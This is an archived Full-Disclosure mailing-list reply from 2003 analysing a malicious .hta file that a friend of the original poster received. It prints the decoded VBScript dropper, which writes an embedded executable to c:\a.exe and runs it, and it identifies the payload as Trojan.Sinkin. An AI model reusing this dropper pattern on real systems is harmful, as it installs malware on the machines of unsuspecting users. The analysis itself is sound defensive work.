<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="MSHTML 6.00.2800.1276" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV>.hta files is a proprietary concept, and only works in conjunction with
Internet Explorer (specifically version 5 and above). basicly its much like a
.html except it has no security restrictions</DIV>
<DIV><FONT face=Arial size=2></FONT> </DIV>
<DIV>there are 2 things being encoded in the script you send<BR><BR>an
executable in a string called m<BR>and a piece of vbscript code in a string
called c<BR><BR>they seem to be encoded to trick virusscanners into letting them
pass<BR><BR>decoding the vbscript code we get<BR><BR> <script
language="VBScript"><BR>Dim fs, dr, f<BR>Set fs =
CreateObject("Scripting.FileSystemObject")<BR>f = "c:\a.exe"<BR>Set dr =
fs.CreateTextFile(f, True)<BR>dr.Writeline m<BR>dr.close<BR>Set
shell=CreateObject("WScript.Shell")<BR>shell.run(f)<BR>self.close<BR></SCRIPT>
<BR><BR>which basicly says, get the embedded .exe file store it in c:\a.exe then
execute it<BR></DIV>
<DIV>the exe being dropped is identified by norton as being Trojan.Sinkin</DIV>
<DIV><FONT face=Arial size=2></FONT> </DIV>
<DIV><quote><BR> Trojan.Sinkin is a Trojan Horse that changes the
Internet Explorer start and search pages, and sends </DIV>
<DIV> AOL Instant Messenger information to a remote host. <BR>
This Trojan may also display advertisements when the user is browsing the
Web<BR></quote></DIV>
<DIV><FONT face=Arial size=2></FONT> </DIV>
<DIV>now you know</DIV>
<DIV><FONT face=Arial size=2></FONT><FONT face=Arial size=2></FONT><BR>-----
Original Message ----- <BR>From: Jim Duggan <BR>To:
full-disclosure@lists.netsys.com <BR>Sent: Thursday, November 20, 2003 2:31
AM<BR>Subject: [Full-Disclosure] .hta virus analysys<BR><BR><BR><BR>A friend
contracted this .hta that seems to edit your profile with a link to itself,
http://www.talkstocks.net/<BR>attached is the hta file it attempts to run.
Its looks to be encoded, which is something i dont know much about but im sure
most people on this list will have no problem reading it, just wondering what it
does.<BR><BR>Any help appreciated<BR>Thx<BR><BR>Jason</DIV></BODY></HTML>